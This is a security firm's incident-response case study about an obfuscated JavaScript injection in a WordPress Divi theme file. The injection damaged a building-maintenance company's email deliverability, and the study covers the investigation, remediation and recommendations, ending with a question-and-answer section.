Client
Enviroscope
Industry
Commercial & Industrial Building Maintenance Services
Challenge
Enviroscope experienced a security incident affecting its public website that led to unexpected visitor behaviour and subsequent email deliverability issues.
The organisation was blacklisted by multiple spam detection services, causing legitimate business emails to be blocked or filtered as spam, particularly on Microsoft email platforms. This resulted in critical communications failing to reach clients, severely disrupting service delivery, client engagement, invoicing, and day-to-day business operations.
At the same time, concerns that the public website may have been compromised heightened the risk to brand trust, security, and email reputation, turning the issue into a major operational and reputational threat that required urgent action.
Compounding the challenge, full administrative access to the WordPress hosting environment was not available, limiting visibility into provider level logs and controls.
Investigation and Findings
Sentry Cyber conducted a targeted incident investigation and confirmed a malicious JavaScript injection within a Divi theme asset used by the Enviroscope website.
Key findings included
• Obfuscated malicious code injected into a Divi theme JavaScript file
• Malware designed to avoid detection by administrators, bots, and scanners
• Dynamic delivery of a second stage payload from attacker controlled infrastructure
• Visitor targeted behaviour consistent with phishing or redirection campaigns
• Correlation between the website compromise and domain reputation degradation
• Increased likelihood of emails being flagged as junk by Microsoft email platforms
Due to restricted access to one of the hosting control panels, a provider level compromise could not be ruled out.
Response and Remediation
Sentry Cyber executed a rapid containment and remediation plan, responding within hours of engagement. Critical issues were identified through a combination of offline forensic analysis and live WordPress-level remediation, allowing threats to be contained and addressed immediately.
Recognising the significant impact on business operations and client communications, our team worked outside standard business hours to accelerate recovery. A comprehensive investigation and remediation report was delivered within one week, restoring email deliverability, securing the website, and stabilising business communications.
Actions taken included
• Preservation and review of website backups to identify indicators of compromise
• Identification and removal of malicious JavaScript from the affected theme file
• Validation that malicious visitor side behaviour had ceased
• Targeted review of high risk filesystem locations within accessible scope
• DNS and email authentication review to support recovery of domain reputation
• Guidance provided to reduce false positive spam filtering
The malicious behaviour was successfully eradicated, and no further injection activity was observed following remediation.
Outcome
• Website malware fully removed and validated
• Visitor risk eliminated
• Domain reputation stabilised
• Email deliverability improved, particularly for Microsoft based recipients
• Residual risk clearly identified and documented
• Client provided with a clear remediation and prevention roadmap
Lessons Learned
This incident highlighted how modern website malware can directly impact email reputation and business communications, even when email systems themselves are not directly compromised. It also demonstrated the importance of full administrative visibility at the hosting layer and the risks associated with legacy or inaccessible hosting environments.
Ongoing Recommendations
Sentry Cyber recommended
• Migration to a secure hosting provider with full administrative control
• Enforced MFA for all administrative access
• Regular patching and removal of unused website components
• File integrity monitoring for early detection of future tampering
• Adoption of Sentry Cyber’s Guardian Shield managed security service for continuous protection
Case Study Questions and Answers
What first indicated that something was wrong?
Enviroscope observed unusual behaviour affecting their website and a noticeable decline in email deliverability, particularly with emails being flagged as spam by Microsoft email platforms.
Was email infrastructure directly compromised?
No direct compromise of the email system was identified. The investigation determined that the website compromise negatively impacted domain reputation, which in turn affected email deliverability.
What type of malware was involved?
The incident involved malicious JavaScript injected into a WordPress Divi theme file. The code was obfuscated and designed to evade detection while delivering a second stage payload to website visitors.
How did the malware avoid detection?
The malicious script was programmed to avoid execution for administrators, bots, APIs, and automated scanners. It only activated for normal website visitors, increasing dwell time and reducing the likelihood of early detection.
What risks did this pose to visitors?
Visitors were exposed to potential phishing content or malicious redirects, creating a risk to user safety and brand trust.
Why was the investigation challenging?
Full access to one of the hosting control panels was not available. This limited the ability to perform a complete provider level audit and meant a hosting layer compromise could not be fully ruled out.
How was the malware removed?
Sentry Cyber identified and removed the injected code directly from the affected theme file and validated that malicious behaviour had completely ceased after remediation.
How was containment verified?
Post remediation testing confirmed that no further visitor side injections were occurring and no additional indicators of compromise were detected within the accessible environment.
Did the incident have a long term impact?
Once the malware was removed and DNS and email configuration guidance was applied, domain reputation began stabilising and email deliverability improved.
What could have prevented this incident?
Regular patching of website components, file integrity monitoring, enforced multi factor authentication, and full administrative visibility at the hosting layer would have significantly reduced the likelihood and impact of the compromise.
What was the most important lesson learned?
Website security incidents can directly affect email reputation and business communications even when email systems themselves are not breached.
What ongoing protections were recommended?
Sentry Cyber recommended migration to a secure hosting provider, continuous monitoring, stronger access controls, and adoption of a managed security service to reduce recurrence risk.